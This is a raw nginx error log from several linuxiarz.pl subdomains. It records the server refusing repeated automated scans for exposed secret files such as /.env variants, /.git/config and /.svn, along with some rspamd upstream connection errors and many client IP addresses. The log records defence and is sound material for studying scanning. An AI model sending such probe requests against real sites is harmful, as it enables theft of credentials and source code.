[error] 2202#2202: *490897 access forbidden by rule, client: 35.180.164.11, server: pliki.linuxiarz.pl, request: "GET /.git/HEAD HTTP/2.0", host: "pliki.linuxiarz.pl" +2021/02/24 09:16:23 [error] 2202#2202: *514551 access forbidden by rule, client: 45.15.143.183, server: kompilacje.linuxiarz.pl, request: "GET /.env HTTP/1.1", host: "kompilacje.linuxiarz.pl" +2021/02/24 09:16:29 [error] 2202#2202: *514553 access forbidden by rule, client: 45.15.143.183, server: kompilacje.linuxiarz.pl, request: "GET /.env HTTP/1.1", host: "kompilacje.linuxiarz.pl" +2021/03/01 00:52:03 [error] 23045#23045: *23751 access forbidden by rule, client: 185.220.100.251, server: nginx.linuxiarz.pl, request: "GET /.git/config HTTP/1.1", host: "nginx.linuxiarz.pl" +2021/03/01 00:52:03 [error] 23045#23045: *23752 access forbidden by rule, client: 185.220.100.251, server: kompilacje.linuxiarz.pl, request: "GET /.git/config HTTP/1.1", host: "kompilacje.linuxiarz.pl" +2021/03/01 00:52:04 [error] 23045#23045: *23755 access forbidden by rule, client: 46.182.21.248, server: pliki.linuxiarz.pl, request: "GET /.git/config HTTP/1.1", host: "pliki.linuxiarz.pl" +2021/03/01 00:52:05 [error] 23045#23045: *23760 access forbidden by rule, client: 185.107.47.215, server: kompilacje.linuxiarz.pl, request: "GET /.git/config HTTP/1.1", host: "kompilacje.linuxiarz.pl", referrer: "http://kompilacje.linuxiarz.pl/.git/config" +2021/03/01 00:52:06 [error] 23045#23045: *23761 access forbidden by rule, client: 199.249.230.64, server: nginx.linuxiarz.pl, request: "GET /.git/config HTTP/1.1", host: "nginx.linuxiarz.pl", referrer: "http://nginx.linuxiarz.pl/.git/config" +2021/03/01 00:52:14 [error] 23045#23045: *23765 access forbidden by rule, client: 185.220.101.146, server: pliki.linuxiarz.pl, request: "GET /.git/config HTTP/1.1", host: "pliki.linuxiarz.pl", referrer: "http://pliki.linuxiarz.pl/.git/config" +2021/03/13 06:25:45 [error] 30266#30266: *49590 access forbidden by rule, client: 138.197.177.216, server: kompilacje.linuxiarz.pl, request: "GET /.env HTTP/1.1", host: "kompilacje.linuxiarz.pl" +2021/03/13 11:18:59 [error] 30266#30266: *50464 access forbidden by rule, client: 138.197.177.216, server: nginx.linuxiarz.pl, request: "GET /.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2021/03/17 23:50:33 [error] 11006#11006: *9 directory index of "/var/www/repo.linuxiarz.pl//" is forbidden, client: 109.173.147.93, server: repo.linuxiarz.pl, request: "GET / HTTP/2.0", host: "repo.linuxiarz.pl" +2021/03/17 23:54:56 [error] 11006#11006: *30 directory index of "/var/www/repo.linuxiarz.pl//" is forbidden, client: 109.173.147.93, server: repo.linuxiarz.pl, request: "GET / HTTP/2.0", host: "repo.linuxiarz.pl" +2021/03/17 23:55:18 [error] 11724#11724: *1 directory index of "/var/www/repo.linuxiarz.pl//" is forbidden, client: 109.173.147.93, server: repo.linuxiarz.pl, request: "GET / HTTP/2.0", host: "repo.linuxiarz.pl" +2021/03/17 23:55:19 [error] 11724#11724: *1 directory index of "/var/www/repo.linuxiarz.pl//" is forbidden, client: 109.173.147.93, server: repo.linuxiarz.pl, request: "GET / HTTP/2.0", host: "repo.linuxiarz.pl" +2021/03/17 23:56:23 [error] 11724#11724: *1 directory index of "/var/www/repo.linuxiarz.pl//" is forbidden, client: 109.173.147.93, server: repo.linuxiarz.pl, request: "GET / HTTP/2.0", host: "repo.linuxiarz.pl" +2021/04/20 17:22:52 [error] 12019#12019: *76755 access forbidden by rule, client: 136.144.33.3, server: pliki.linuxiarz.pl, request: "GET /.env HTTP/1.1", host: "pliki.linuxiarz.pl" +2021/04/21 23:59:09 [error] 12019#12019: *89028 access forbidden by rule, client: 136.144.33.11, server: kompilacje.linuxiarz.pl, request: "GET /.env HTTP/1.1", host: "kompilacje.linuxiarz.pl" +2021/04/22 08:43:08 [error] 12019#12019: *93584 access forbidden by rule, client: 136.144.33.11, server: nginx.linuxiarz.pl, request: "GET /.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2021/05/11 01:54:28 [error] 12019#12019: *205889 access forbidden by rule, client: 52.249.194.108, server: pliki.linuxiarz.pl, request: "GET /.env HTTP/1.1", host: "pliki.linuxiarz.pl" +2021/05/11 01:54:34 [error] 12019#12019: *205891 access forbidden by rule, client: 52.249.194.108, server: kodi.linuxiarz.pl, request: "GET /.env HTTP/1.1", host: "kodi.linuxiarz.pl" +2021/05/14 06:04:53 [error] 12019#12019: *229060 access forbidden by rule, client: 2.57.122.250, server: pliki.linuxiarz.pl, request: "GET /.env HTTP/1.1", host: "pliki.linuxiarz.pl" +2021/05/14 06:04:56 [error] 12019#12019: *229073 access forbidden by rule, client: 2.57.122.250, server: pliki.linuxiarz.pl, request: "GET /.env HTTP/1.1", host: "pliki.linuxiarz.pl" +2021/05/14 06:04:57 [error] 12019#12019: *229076 access forbidden by rule, client: 2.57.122.250, server: pliki.linuxiarz.pl, request: "GET /.env HTTP/1.1", host: "pliki.linuxiarz.pl" +2021/05/14 06:04:58 [error] 12019#12019: *229080 access forbidden by rule, client: 2.57.122.250, server: kodi.linuxiarz.pl, request: "GET /.env HTTP/1.1", host: "kodi.linuxiarz.pl" +2021/05/14 06:05:01 [error] 12019#12019: *229093 access forbidden by rule, client: 2.57.122.250, server: kodi.linuxiarz.pl, request: "GET /.env HTTP/1.1", host: "kodi.linuxiarz.pl" +2021/05/14 06:05:01 [error] 12019#12019: *229096 access forbidden by rule, client: 2.57.122.250, server: kodi.linuxiarz.pl, request: "GET /.env HTTP/1.1", host: "kodi.linuxiarz.pl" +2021/05/15 01:05:47 [error] 12019#12019: *233303 access forbidden by rule, client: 2.57.122.250, server: pliki.linuxiarz.pl, request: "GET /.env HTTP/1.1", host: "pliki.linuxiarz.pl" +2021/05/15 01:05:48 [error] 12019#12019: *233306 access forbidden by rule, client: 2.57.122.250, server: kodi.linuxiarz.pl, request: "GET /.env HTTP/1.1", host: "kodi.linuxiarz.pl" +2021/05/26 11:47:26 [error] 1249#1249: *6227 access forbidden by rule, client: 144.91.79.8, server: kodi.linuxiarz.pl, request: "GET /.env HTTP/1.1", host: "kodi.linuxiarz.pl" +2021/05/27 04:40:36 [error] 1249#1249: *9134 access forbidden by rule, client: 45.79.125.36, server: pliki.linuxiarz.pl, request: "GET /.env HTTP/2.0", host: "pliki.linuxiarz.pl" +2021/05/27 13:37:02 [error] 1249#1249: *10697 access forbidden by rule, client: 144.91.79.8, server: pliki.linuxiarz.pl, request: "GET /.env HTTP/1.1", host: "pliki.linuxiarz.pl" +2021/06/04 09:48:40 [error] 24822#24822: *38076 access forbidden by rule, client: 185.153.196.198, server: nginx.linuxiarz.pl, request: "GET /.git/config HTTP/1.1", host: "nginx.linuxiarz.pl" +2021/06/04 18:15:45 [error] 24822#24822: *40016 access forbidden by rule, client: 185.153.196.198, server: pliki.linuxiarz.pl, request: "GET /.git/config HTTP/1.1", host: "pliki.linuxiarz.pl" +2021/06/13 14:41:30 [error] 2477#2477: *73 access forbidden by rule, client: 109.173.214.78, server: quarantine.linuxiarz.pl, request: "GET / HTTP/2.0", host: "quarantine.linuxiarz.pl" +2021/06/27 08:36:19 [error] 4499#4499: *88943 access forbidden by rule, client: 20.85.210.6, server: kompilacje.linuxiarz.pl, request: "GET /.env HTTP/1.1", host: "kompilacje.linuxiarz.pl" +2021/06/27 08:40:57 [error] 4499#4499: *88980 access forbidden by rule, client: 20.85.210.6, server: nginx.linuxiarz.pl, request: "GET /.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2021/06/27 08:42:48 [error] 4499#4499: *89010 access forbidden by rule, client: 20.85.210.6, server: pliki.linuxiarz.pl, request: "GET /.env HTTP/1.1", host: "pliki.linuxiarz.pl" +2021/07/01 08:17:27 [error] 27331#27331: *22779 access forbidden by rule, client: 23.98.176.96, server: pliki.linuxiarz.pl, request: "GET /.env HTTP/1.1", host: "pliki.linuxiarz.pl" +2021/07/04 05:32:04 [error] 27331#27331: *40867 access forbidden by rule, client: 23.100.87.46, server: pliki.linuxiarz.pl, request: "GET /.env HTTP/1.1", host: "pliki.linuxiarz.pl" +2021/07/04 05:32:05 [error] 27331#27331: *40869 access forbidden by rule, client: 23.100.87.46, server: pliki.linuxiarz.pl, request: "GET /.env HTTP/1.1", host: "pliki.linuxiarz.pl" +2021/07/07 13:33:10 [error] 27331#27331: *63279 access forbidden by rule, client: 23.100.87.46, server: kompilacje.linuxiarz.pl, request: "GET /.env HTTP/1.1", host: "kompilacje.linuxiarz.pl" +2021/07/07 13:33:11 [error] 27331#27331: *63281 access forbidden by rule, client: 23.100.87.46, server: kompilacje.linuxiarz.pl, request: "GET /.env HTTP/1.1", host: "kompilacje.linuxiarz.pl" +2021/07/20 22:20:31 [error] 5777#5777: *43419 access forbidden by rule, client: 213.202.216.189, server: pliki.linuxiarz.pl, request: "GET /.git/config HTTP/1.1", host: "pliki.linuxiarz.pl" +2021/07/20 22:20:32 [error] 5777#5777: *43423 access forbidden by rule, client: 185.220.100.252, server: nginx.linuxiarz.pl, request: "GET /.git/config HTTP/1.1", host: "nginx.linuxiarz.pl" +2021/07/20 22:20:33 [error] 5777#5777: *43429 access forbidden by rule, client: 185.220.102.248, server: pliki.linuxiarz.pl, request: "GET /.git/config HTTP/1.1", host: "pliki.linuxiarz.pl", referrer: "http://pliki.linuxiarz.pl/.git/config" +2021/07/20 22:20:34 [error] 5777#5777: *43430 access forbidden by rule, client: 217.160.174.204, server: nginx.linuxiarz.pl, request: "GET /.git/config HTTP/1.1", host: "nginx.linuxiarz.pl", referrer: "http://nginx.linuxiarz.pl/.git/config" +2021/07/20 22:20:42 [error] 5777#5777: *43431 access forbidden by rule, client: 198.144.121.93, server: kompilacje.linuxiarz.pl, request: "GET /.git/config HTTP/1.1", host: "kompilacje.linuxiarz.pl" +2021/07/20 22:20:44 [error] 5777#5777: *43434 access forbidden by rule, client: 31.42.184.136, server: kompilacje.linuxiarz.pl, request: "GET /.git/config HTTP/1.1", host: "kompilacje.linuxiarz.pl", referrer: "http://kompilacje.linuxiarz.pl/.git/config" +2021/07/25 21:23:04 [error] 5777#5777: *84046 access forbidden by rule, client: 54.87.48.62, server: pliki.linuxiarz.pl, request: "GET /.env HTTP/1.1", host: "pliki.linuxiarz.pl" +2021/07/27 09:27:04 [error] 5777#5777: *97805 access forbidden by rule, client: 20.97.5.68, server: pliki.linuxiarz.pl, request: "GET /.env HTTP/1.1", host: "pliki.linuxiarz.pl" +2021/08/07 19:28:42 [error] 5777#5777: *201535 access forbidden by rule, client: 193.70.30.99, server: kompilacje.linuxiarz.pl, request: "GET /.git/config HTTP/1.1", host: "kompilacje.linuxiarz.pl" +2021/08/07 19:28:43 [error] 5777#5777: *201536 access forbidden by rule, client: 193.70.30.99, server: nginx.linuxiarz.pl, request: "GET /.git/config HTTP/1.1", host: "nginx.linuxiarz.pl" +2021/08/07 19:28:45 [error] 5777#5777: *201537 access forbidden by rule, client: 193.70.30.99, server: pliki.linuxiarz.pl, request: "GET /.git/config HTTP/1.1", host: "pliki.linuxiarz.pl" +2021/08/09 04:33:04 [error] 5777#5777: *213103 access forbidden by rule, client: 23.88.54.121, server: pliki.linuxiarz.pl, request: "GET /.env HTTP/1.1", host: "pliki.linuxiarz.pl" +2021/08/20 15:47:05 [error] 21225#21225: *285507 connect() failed (111: Connection refused) while connecting to upstream, client: 85.221.253.46, server: rspamd.linuxiarz.pl, request: "GET / HTTP/2.0", upstream: "http://127.0.0.1:11334/", host: "rspamd.linuxiarz.pl" +2021/08/20 15:47:05 [error] 21225#21225: *285507 connect() failed (111: Connection refused) while connecting to upstream, client: 85.221.253.46, server: rspamd.linuxiarz.pl, request: "GET /favicon.ico HTTP/2.0", upstream: "http://127.0.0.1:11334/favicon.ico", host: "rspamd.linuxiarz.pl", referrer: "https://rspamd.linuxiarz.pl/" +2021/08/20 15:47:06 [error] 21225#21225: *285507 connect() failed (111: Connection refused) while connecting to upstream, client: 85.221.253.46, server: rspamd.linuxiarz.pl, request: "GET / HTTP/2.0", upstream: "http://127.0.0.1:11334/", host: "rspamd.linuxiarz.pl" +2021/08/20 15:47:06 [error] 21225#21225: *285507 connect() failed (111: Connection refused) while connecting to upstream, client: 85.221.253.46, server: rspamd.linuxiarz.pl, request: "GET /favicon.ico HTTP/2.0", upstream: "http://127.0.0.1:11334/favicon.ico", host: "rspamd.linuxiarz.pl", referrer: "https://rspamd.linuxiarz.pl/" +2021/08/20 15:47:08 [error] 21225#21225: *285507 connect() failed (111: Connection refused) while connecting to upstream, client: 85.221.253.46, server: rspamd.linuxiarz.pl, request: "GET / HTTP/2.0", upstream: "http://127.0.0.1:11334/", host: "rspamd.linuxiarz.pl" +2021/08/20 15:47:08 [error] 21225#21225: *285507 connect() failed (111: Connection refused) while connecting to upstream, client: 85.221.253.46, server: rspamd.linuxiarz.pl, request: "GET /favicon.ico HTTP/2.0", upstream: "http://127.0.0.1:11334/favicon.ico", host: "rspamd.linuxiarz.pl", referrer: "https://rspamd.linuxiarz.pl/" +2021/08/20 15:47:08 [error] 21225#21225: *285507 connect() failed (111: Connection refused) while connecting to upstream, client: 85.221.253.46, server: rspamd.linuxiarz.pl, request: "GET / HTTP/2.0", upstream: "http://127.0.0.1:11334/", host: "rspamd.linuxiarz.pl" +2021/08/20 15:47:08 [error] 21225#21225: *285507 connect() failed (111: Connection refused) while connecting to upstream, client: 85.221.253.46, server: rspamd.linuxiarz.pl, request: "GET /favicon.ico HTTP/2.0", upstream: "http://127.0.0.1:11334/favicon.ico", host: "rspamd.linuxiarz.pl", referrer: "https://rspamd.linuxiarz.pl/" +2021/08/20 15:47:08 [error] 21225#21225: *285507 connect() failed (111: Connection refused) while connecting to upstream, client: 85.221.253.46, server: rspamd.linuxiarz.pl, request: "GET / HTTP/2.0", upstream: "http://127.0.0.1:11334/", host: "rspamd.linuxiarz.pl" +2021/08/20 15:47:09 [error] 21225#21225: *285507 connect() failed (111: Connection refused) while connecting to upstream, client: 85.221.253.46, server: rspamd.linuxiarz.pl, request: "GET /favicon.ico HTTP/2.0", upstream: "http://127.0.0.1:11334/favicon.ico", host: "rspamd.linuxiarz.pl", referrer: "https://rspamd.linuxiarz.pl/" +2021/08/20 15:47:09 [error] 21225#21225: *285507 connect() failed (111: Connection refused) while connecting to upstream, client: 85.221.253.46, server: rspamd.linuxiarz.pl, request: "GET / HTTP/2.0", upstream: "http://127.0.0.1:11334/", host: "rspamd.linuxiarz.pl" +2021/08/20 15:47:09 [error] 21225#21225: *285507 connect() failed (111: Connection refused) while connecting to upstream, client: 85.221.253.46, server: rspamd.linuxiarz.pl, request: "GET /favicon.ico HTTP/2.0", upstream: "http://127.0.0.1:11334/favicon.ico", host: "rspamd.linuxiarz.pl", referrer: "https://rspamd.linuxiarz.pl/" +2021/08/20 15:47:09 [error] 21225#21225: *285507 connect() failed (111: Connection refused) while connecting to upstream, client: 85.221.253.46, server: rspamd.linuxiarz.pl, request: "GET / HTTP/2.0", upstream: "http://127.0.0.1:11334/", host: "rspamd.linuxiarz.pl" +2021/08/20 15:47:09 [error] 21225#21225: *285507 connect() failed (111: Connection refused) while connecting to upstream, client: 85.221.253.46, server: rspamd.linuxiarz.pl, request: "GET /favicon.ico HTTP/2.0", upstream: "http://127.0.0.1:11334/favicon.ico", host: "rspamd.linuxiarz.pl", referrer: "https://rspamd.linuxiarz.pl/" +2021/08/20 15:47:09 [error] 21225#21225: *285507 connect() failed (111: Connection refused) while connecting to upstream, client: 85.221.253.46, server: rspamd.linuxiarz.pl, request: "GET / HTTP/2.0", upstream: "http://127.0.0.1:11334/", host: "rspamd.linuxiarz.pl" +2021/08/20 15:47:09 [error] 21225#21225: *285507 connect() failed (111: Connection refused) while connecting to upstream, client: 85.221.253.46, server: rspamd.linuxiarz.pl, request: "GET /favicon.ico HTTP/2.0", upstream: "http://127.0.0.1:11334/favicon.ico", host: "rspamd.linuxiarz.pl", referrer: "https://rspamd.linuxiarz.pl/" +2021/08/20 15:47:09 [error] 21225#21225: *285507 connect() failed (111: Connection refused) while connecting to upstream, client: 85.221.253.46, server: rspamd.linuxiarz.pl, request: "GET / HTTP/2.0", upstream: "http://127.0.0.1:11334/", host: "rspamd.linuxiarz.pl" +2021/08/20 15:47:09 [error] 21225#21225: *285507 connect() failed (111: Connection refused) while connecting to upstream, client: 85.221.253.46, server: rspamd.linuxiarz.pl, request: "GET /favicon.ico HTTP/2.0", upstream: "http://127.0.0.1:11334/favicon.ico", host: "rspamd.linuxiarz.pl", referrer: "https://rspamd.linuxiarz.pl/" +2021/08/20 15:47:09 [error] 21225#21225: *285507 connect() failed (111: Connection refused) while connecting to upstream, client: 85.221.253.46, server: rspamd.linuxiarz.pl, request: "GET / HTTP/2.0", upstream: "http://127.0.0.1:11334/", host: "rspamd.linuxiarz.pl" +2021/08/20 15:47:09 [error] 21225#21225: *285507 connect() failed (111: Connection refused) while connecting to upstream, client: 85.221.253.46, server: rspamd.linuxiarz.pl, request: "GET /favicon.ico HTTP/2.0", upstream: "http://127.0.0.1:11334/favicon.ico", host: "rspamd.linuxiarz.pl", referrer: "https://rspamd.linuxiarz.pl/" +2021/08/21 14:52:25 [error] 21225#21225: *329904 access forbidden by rule, client: 5.189.154.12, server: kompilacje.linuxiarz.pl, request: "GET /.git/config HTTP/1.1", host: "kompilacje.linuxiarz.pl" +2021/08/21 14:52:25 [error] 21225#21225: *329909 access forbidden by rule, client: 5.189.154.12, server: nginx.linuxiarz.pl, request: "GET /.git/config HTTP/1.1", host: "nginx.linuxiarz.pl" +2021/08/21 14:52:26 [error] 21225#21225: *329914 access forbidden by rule, client: 5.189.154.12, server: pliki.linuxiarz.pl, request: "GET /.git/config HTTP/1.1", host: "pliki.linuxiarz.pl" +2021/09/01 15:46:37 [error] 21225#21225: *778212 access forbidden by rule, client: 40.124.105.177, server: pliki.linuxiarz.pl, request: "GET /.env HTTP/1.1", host: "pliki.linuxiarz.pl" +2021/09/18 04:03:42 [error] 21225#21225: *1336039 access forbidden by rule, client: 23.148.145.53, server: pliki.linuxiarz.pl, request: "GET /.env HTTP/1.1", host: "pliki.linuxiarz.pl" +2021/10/08 06:09:00 [error] 21225#21225: *1663060 access forbidden by rule, client: 3.251.75.89, server: kompilacje.linuxiarz.pl, request: "GET /.env HTTP/1.1", host: "kompilacje.linuxiarz.pl" +2021/10/08 06:09:01 [error] 21225#21225: *1663061 access forbidden by rule, client: 3.251.75.89, server: kompilacje.linuxiarz.pl, request: "GET /vendor/.env HTTP/1.1", host: "kompilacje.linuxiarz.pl" +2021/10/08 06:09:01 [error] 21225#21225: *1663062 access forbidden by rule, client: 3.251.75.89, server: kompilacje.linuxiarz.pl, request: "GET /storage/.env HTTP/1.1", host: "kompilacje.linuxiarz.pl" +2021/10/08 06:09:02 [error] 21225#21225: *1663063 access forbidden by rule, client: 3.251.75.89, server: kompilacje.linuxiarz.pl, request: "GET /public/.env HTTP/1.1", host: "kompilacje.linuxiarz.pl" +2021/10/09 05:15:38 [error] 21225#21225: *1680875 access forbidden by rule, client: 3.251.75.89, server: pliki.linuxiarz.pl, request: "GET /.env HTTP/1.1", host: "pliki.linuxiarz.pl" +2021/10/09 05:15:39 [error] 21225#21225: *1680876 access forbidden by rule, client: 3.251.75.89, server: pliki.linuxiarz.pl, request: "GET /vendor/.env HTTP/1.1", host: "pliki.linuxiarz.pl" +2021/10/09 05:15:40 [error] 21225#21225: *1680877 access forbidden by rule, client: 3.251.75.89, server: pliki.linuxiarz.pl, request: "GET /storage/.env HTTP/1.1", host: "pliki.linuxiarz.pl" +2021/10/09 05:15:40 [error] 21225#21225: *1680878 access forbidden by rule, client: 3.251.75.89, server: pliki.linuxiarz.pl, request: "GET /public/.env HTTP/1.1", host: "pliki.linuxiarz.pl" +2021/10/09 10:57:14 [error] 21225#21225: *1686554 access forbidden by rule, client: 3.251.75.89, server: pliki.linuxiarz.pl, request: "GET /.env HTTP/1.1", host: "pliki.linuxiarz.pl" +2021/10/09 10:57:15 [error] 21225#21225: *1686555 access forbidden by rule, client: 3.251.75.89, server: pliki.linuxiarz.pl, request: "GET /vendor/.env HTTP/1.1", host: "pliki.linuxiarz.pl" +2021/10/09 10:57:16 [error] 21225#21225: *1686556 access forbidden by rule, client: 3.251.75.89, server: pliki.linuxiarz.pl, request: "GET /storage/.env HTTP/1.1", host: "pliki.linuxiarz.pl" +2021/10/09 10:57:16 [error] 21225#21225: *1686557 access forbidden by rule, client: 3.251.75.89, server: pliki.linuxiarz.pl, request: "GET /public/.env HTTP/1.1", host: "pliki.linuxiarz.pl" +2021/10/15 07:03:25 [error] 26342#26342: *38169 access forbidden by rule, client: 104.219.251.41, server: nginx.linuxiarz.pl, request: "GET /.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2021/10/15 07:03:27 [error] 26342#26342: *38170 access forbidden by rule, client: 104.219.251.41, server: nginx.linuxiarz.pl, request: "GET /vendor/.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2021/10/15 07:03:28 [error] 26342#26342: *38171 access forbidden by rule, client: 104.219.251.41, server: nginx.linuxiarz.pl, request: "GET /storage/.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2021/10/15 07:03:30 [error] 26342#26342: *38172 access forbidden by rule, client: 104.219.251.41, server: nginx.linuxiarz.pl, request: "GET /public/.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2021/10/15 17:20:01 [error] 26342#26342: *44415 access forbidden by rule, client: 104.219.251.41, server: pliki.linuxiarz.pl, request: "GET /.env HTTP/1.1", host: "pliki.linuxiarz.pl" +2021/10/15 17:20:03 [error] 26342#26342: *44417 access forbidden by rule, client: 104.219.251.41, server: pliki.linuxiarz.pl, request: "GET /vendor/.env HTTP/1.1", host: "pliki.linuxiarz.pl" +2021/10/15 17:20:06 [error] 26342#26342: *44420 access forbidden by rule, client: 104.219.251.41, server: pliki.linuxiarz.pl, request: "GET /storage/.env HTTP/1.1", host: "pliki.linuxiarz.pl" +2021/10/15 17:20:08 [error] 26342#26342: *44422 access forbidden by rule, client: 104.219.251.41, server: pliki.linuxiarz.pl, request: "GET /public/.env HTTP/1.1", host: "pliki.linuxiarz.pl" +2021/10/16 09:15:35 [error] 26342#26342: *51709 access forbidden by rule, client: 104.219.251.41, server: rspamd.linuxiarz.pl, request: "GET /.env HTTP/1.1", host: "rspamd.linuxiarz.pl" +2021/10/16 09:15:36 [error] 26342#26342: *51710 access forbidden by rule, client: 104.219.251.41, server: rspamd.linuxiarz.pl, request: "GET /vendor/.env HTTP/1.1", host: "rspamd.linuxiarz.pl" +2021/10/16 09:15:38 [error] 26342#26342: *51711 access forbidden by rule, client: 104.219.251.41, server: rspamd.linuxiarz.pl, request: "GET /storage/.env HTTP/1.1", host: "rspamd.linuxiarz.pl" +2021/10/16 09:15:40 [error] 26342#26342: *51712 access forbidden by rule, client: 104.219.251.41, server: rspamd.linuxiarz.pl, request: "GET /public/.env HTTP/1.1", host: "rspamd.linuxiarz.pl" +2021/10/20 22:58:07 [error] 26342#26342: *162295 access forbidden by rule, client: 185.41.152.102, server: kompilacje.linuxiarz.pl, request: "GET /.env HTTP/1.1", host: "kompilacje.linuxiarz.pl" +2021/10/20 22:58:08 [error] 26342#26342: *162302 access forbidden by rule, client: 185.41.152.102, server: nginx.linuxiarz.pl, request: "GET /.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2021/10/20 22:58:09 [error] 26342#26342: *162310 access forbidden by rule, client: 185.41.152.102, server: pliki.linuxiarz.pl, request: "GET /.env HTTP/1.1", host: "pliki.linuxiarz.pl" +2021/10/24 09:31:20 [error] 18754#18754: *11478 access forbidden by rule, client: 176.10.99.200, server: kompilacje.linuxiarz.pl, request: "GET /.git/config HTTP/1.1", host: "kompilacje.linuxiarz.pl" +2021/10/24 09:31:21 [error] 18754#18754: *11482 access forbidden by rule, client: 185.220.101.58, server: nginx.linuxiarz.pl, request: "GET /.git/config HTTP/1.1", host: "nginx.linuxiarz.pl" +2021/10/24 09:31:23 [error] 18754#18754: *11487 access forbidden by rule, client: 104.244.74.211, server: kompilacje.linuxiarz.pl, request: "GET /.git/config HTTP/1.1", host: "kompilacje.linuxiarz.pl", referrer: "http://kompilacje.linuxiarz.pl/.git/config" +2021/10/24 09:31:24 [error] 18754#18754: *11481 access forbidden by rule, client: 185.56.80.65, server: pliki.linuxiarz.pl, request: "GET /.git/config HTTP/1.1", host: "pliki.linuxiarz.pl" +2021/10/24 09:31:24 [error] 18754#18754: *11490 access forbidden by rule, client: 185.220.100.254, server: nginx.linuxiarz.pl, request: "GET /.git/config HTTP/1.1", host: "nginx.linuxiarz.pl", referrer: "http://nginx.linuxiarz.pl/.git/config" +2021/10/24 09:31:26 [error] 18754#18754: *11493 access forbidden by rule, client: 54.36.101.21, server: pliki.linuxiarz.pl, request: "GET /.git/config HTTP/1.1", host: "pliki.linuxiarz.pl", referrer: "http://pliki.linuxiarz.pl/.git/config" +2021/10/31 20:25:05 [error] 18754#18754: *117104 access forbidden by rule, client: 20.115.80.68, server: kompilacje.linuxiarz.pl, request: "GET /.env HTTP/1.1", host: "kompilacje.linuxiarz.pl" +2021/10/31 20:25:08 [error] 18754#18754: *117111 access forbidden by rule, client: 20.115.80.68, server: nginx.linuxiarz.pl, request: "GET /.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2021/10/31 20:25:12 [error] 18754#18754: *117119 access forbidden by rule, client: 20.115.80.68, server: pliki.linuxiarz.pl, request: "GET /.env HTTP/1.1", host: "pliki.linuxiarz.pl" +2021/11/01 11:39:08 [error] 18754#18754: *122323 access forbidden by rule, client: 51.89.247.186, server: kompilacje.linuxiarz.pl, request: "GET /.env HTTP/1.1", host: "kompilacje.linuxiarz.pl" +2021/11/08 07:17:28 [error] 18754#18754: *212085 access forbidden by rule, client: 185.41.152.102, server: kompilacje.linuxiarz.pl, request: "GET /.env HTTP/1.1", host: "kompilacje.linuxiarz.pl" +2021/11/08 07:17:29 [error] 18754#18754: *212093 access forbidden by rule, client: 185.41.152.102, server: nginx.linuxiarz.pl, request: "GET /.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2021/11/08 07:17:30 [error] 18754#18754: *212101 access forbidden by rule, client: 185.41.152.102, server: pliki.linuxiarz.pl, request: "GET /.env HTTP/1.1", host: "pliki.linuxiarz.pl" +2021/11/09 02:15:23 [error] 18754#18754: *226075 access forbidden by rule, client: 31.7.63.42, server: kodi.linuxiarz.pl, request: "GET /.svn HTTP/1.1", host: "kodi.linuxiarz.pl" +2021/11/12 05:48:17 [error] 18754#18754: *269405 access forbidden by rule, client: 3.134.90.80, server: kodi.linuxiarz.pl, request: "GET /.env HTTP/1.1", host: "kodi.linuxiarz.pl" +2021/11/12 05:48:17 [error] 18754#18754: *269406 access forbidden by rule, client: 3.134.90.80, server: kompilacje.linuxiarz.pl, request: "GET /.env HTTP/1.1", host: "kompilacje.linuxiarz.pl" +2021/11/12 05:48:17 [error] 18754#18754: *269408 access forbidden by rule, client: 3.134.90.80, server: pliki.linuxiarz.pl, request: "GET /.env HTTP/1.1", host: "pliki.linuxiarz.pl" +2021/11/17 11:11:19 [error] 18754#18754: *318140 access forbidden by rule, client: 23.146.241.19, server: nginx.linuxiarz.pl, request: "GET /.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2021/11/17 11:12:18 [error] 18754#18754: *318156 access forbidden by rule, client: 23.146.241.19, server: pliki.linuxiarz.pl, request: "GET /.env HTTP/1.1", host: "pliki.linuxiarz.pl" +2021/11/21 15:29:21 [error] 15701#15701: *3432 access forbidden by rule, client: 31.7.63.42, server: kodi.linuxiarz.pl, request: "GET /.svn HTTP/1.1", host: "kodi.linuxiarz.pl" +2021/11/22 20:53:00 [error] 15701#15701: *20100 access forbidden by rule, client: 31.7.63.42, server: pliki.linuxiarz.pl, request: "GET /.svn HTTP/1.1", host: "pliki.linuxiarz.pl" +2021/11/22 21:54:33 [error] 15701#15701: *21234 access forbidden by rule, client: 31.7.63.42, server: nginx.linuxiarz.pl, request: "GET /.svn HTTP/1.1", host: "nginx.linuxiarz.pl" +2021/11/22 21:54:33 [error] 15701#15701: *21235 access forbidden by rule, client: 31.7.63.42, server: kompilacje.linuxiarz.pl, request: "GET /.svn HTTP/1.1", host: "kompilacje.linuxiarz.pl" +2021/11/26 05:04:23 [error] 15701#15701: *65325 access forbidden by rule, client: 159.223.62.240, server: pliki.linuxiarz.pl, request: "GET /core/.env HTTP/1.1", host: "pliki.linuxiarz.pl" +2021/11/26 05:04:23 [error] 15701#15701: *65326 access forbidden by rule, client: 159.223.62.240, server: pliki.linuxiarz.pl, request: "GET /locally/.env HTTP/1.1", host: "pliki.linuxiarz.pl" +2021/11/26 05:04:23 [error] 15701#15701: *65327 access forbidden by rule, client: 159.223.62.240, server: pliki.linuxiarz.pl, request: "GET /localhost/.env HTTP/1.1", host: "pliki.linuxiarz.pl" +2021/11/26 05:04:23 [error] 15700#15700: *65330 access forbidden by rule, client: 159.223.62.240, server: pliki.linuxiarz.pl, request: "GET /staging/.env HTTP/1.1", host: "pliki.linuxiarz.pl" +2021/11/26 05:04:23 [error] 15700#15700: *65331 access forbidden by rule, client: 159.223.62.240, server: pliki.linuxiarz.pl, request: "GET /public/.env HTTP/1.1", host: "pliki.linuxiarz.pl" +2021/11/26 05:04:23 [error] 15701#15701: *65332 access forbidden by rule, client: 159.223.62.240, server: pliki.linuxiarz.pl, request: "GET /dev/.env HTTP/1.1", host: "pliki.linuxiarz.pl" +2021/11/26 05:04:23 [error] 15701#15701: *65328 access forbidden by rule, client: 159.223.62.240, server: pliki.linuxiarz.pl, request: "GET /development/.env HTTP/1.1", host: "pliki.linuxiarz.pl" 